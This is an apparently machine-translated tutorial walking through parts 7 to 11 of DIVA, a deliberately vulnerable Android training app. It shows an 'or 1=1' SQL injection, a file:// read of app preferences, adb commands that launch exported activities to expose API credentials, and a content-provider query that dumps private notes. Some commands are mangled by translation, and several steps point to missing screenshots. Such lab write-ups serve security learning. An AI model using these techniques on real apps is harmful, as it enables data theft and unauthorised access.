Next to the unfinished article "Android App vulnerability learning (I)", we will continue the rest of the article.

Part 7 unsafe input 1 (sqli)

Open log:

ADB logcat

Enter a single quotation mark. You can see the error message in the log. There is SQL injection.

Enter 'or' 1 '=' 1 to return all user passwords.

Part 8 unsafe input 2 (read local file)

Access to any local file, input

file:///data/data/jakhar.aseem.diva/shared_prefs/jakhar.aseem.diva_preferences.xml

Part 9 access control 1 (activity 1)

To view the activity components exposed in the androidmanifest.xml file:

Use am (activity manager tool) to start exposed components to bypass permission control:

adb shell am start jakhar.aseem.diva/.APICredsActivity

adb shell am start -n jakhar.aseem.diva/.APICredsActivity -a jakhar.aseem.diva.action.VIEW_CREDS

You can also use drozer to do this:

Part 10 access control 2 (activity 2)

Input ADB shell am start jakhar. Aseem. Diva /. Apicreds2activity, and the situation in part9 does not appear. The verification pin code is added.

Part 11 access control 3 (content providers)

To find exposed content providers components:

Then look for the SmalI file that contains content: / /.

$ grep -lr “content://” *

View private log content

$ adb shell content query –uri content://jakhar.aseem.diva.provider.notesprovider/notes

Another way: using drozer:

summary

In this paper, the last unfinished content is roughly mentioned. You can raise any questions during the learning test. Let's communicate with each other. In order to better communicate, please join in the learning group, ask the author boldly and grow together.